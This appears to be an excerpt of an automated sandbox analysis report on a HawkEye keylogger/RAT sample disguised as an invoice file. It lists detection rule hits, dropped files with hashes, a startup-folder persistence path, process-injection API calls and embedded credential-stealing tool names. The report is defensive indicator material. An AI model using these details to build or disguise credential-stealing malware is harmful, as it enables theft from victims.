Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: dropped/hawkgoods.exe, type: DROPPED | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: dropped/hawkgoods.exe, type: DROPPED | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large array initializations
Source: origigoods40.exe.5.dr, <PrivateImplementationDetails>{772D8D2C-540E-45C7-B77B-87944040F8A1}/3BD2C1DB-851D-4774-A593-2F90268EC16C.cs | Large array initialization: .cctor: array initializer size 11965
Source: 7.0.origigoods40.exe.c30000.0.unpack, <PrivateImplementationDetails>{772D8D2C-540E-45C7-B77B-87944040F8A1}/3BD2C1DB-851D-4774-A593-2F90268EC16C.cs | Large array initialization: .cctor: array initializer size 11965
Source: 7.2.origigoods40.exe.c30000.0.unpack, <PrivateImplementationDetails>{772D8D2C-540E-45C7-B77B-87944040F8A1}/3BD2C1DB-851D-4774-A593-2F90268EC16C.cs | Large array initialization: .cctor: array initializer size 11965
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: PO_Invoices_pdf.exe
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B658C6 NtUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B6581E NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B6596E NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B657DA NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B65941 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Code function: 0_2_02F7CC7C
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Code function: 0_2_07B81928
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Code function: 0_2_07B82950
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Code function: 0_2_07C493D8
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Code function: 0_2_07C47F80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_0095CF58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_0095CF38
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_002FD426
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_002FD523
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_0030D5AE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00307646
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_003329BE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00336AF4
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_0035ABFC
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00353C4D
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00353CBE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00353D2F
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_002FED03
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00353DC0
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_0030AFA6
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_002FCF92
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B36048
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B38710
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B35758
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B37098
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B37088
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B31D98
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_0032C7BC
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Code function: 7_2_00C35804
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Code function: 7_2_00C32296
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Code function: 7_2_015146A0
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Code function: 7_2_015145B0
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Code function: 7_2_0151D300
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 25ADE9899C000A27570B527CFFC938EC9626978219EC8A086082B113CBE4F492
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\hawkgoods.exe B3D02FD5C69293DB419AC03CDF6396BD5E7765682FB3B2390454D9A52BA2CA88
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\origigoods20.exe 1C7757EE223F2480FBC478AE2ECAF82E1D3C17F2E4D47581D3972416166C54AB
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\origigoods40.exe CFAD1E486666FF3FB042BA0E9967634DE1065F1BBD505C61B3295E55705A2A50
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: String function: 0033BA9D appears 35 times
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: PO_Invoices_pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: I$s#$lT3ssl.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: hawkgoods.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: hawkgoods.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: hawkgoods.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: PO_Invoices_pdf.exeBinary or memory string: OriginalFilename vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277173827.00000000030A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPE.dll" vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLoginForm.dll6 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameyuhttCAxwLFZshSGnwmMrfvGZfDSzxEDrzwk.exe4 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVNXT.exe* vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameE.exe4 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameczzfIDlMOIuCXDkvbHSanvcpuIRYWjNm.exe4 vs PO_Invoices_pdf.exe
Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameViottoBinder_Stub.exe
Source: PO_Invoices_pdf.exe, 00000000.00000002.309980821.0000000009400000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs PO_Invoices_pdf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Section loaded: security.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Section loaded: security.dll
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Section loaded: security.dll
Source: PO_Invoices_pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0000001B.00000002.651684392.0000000007F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.651227274.0000000007C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.398436711.0000000007540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.398332656.00000000073F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
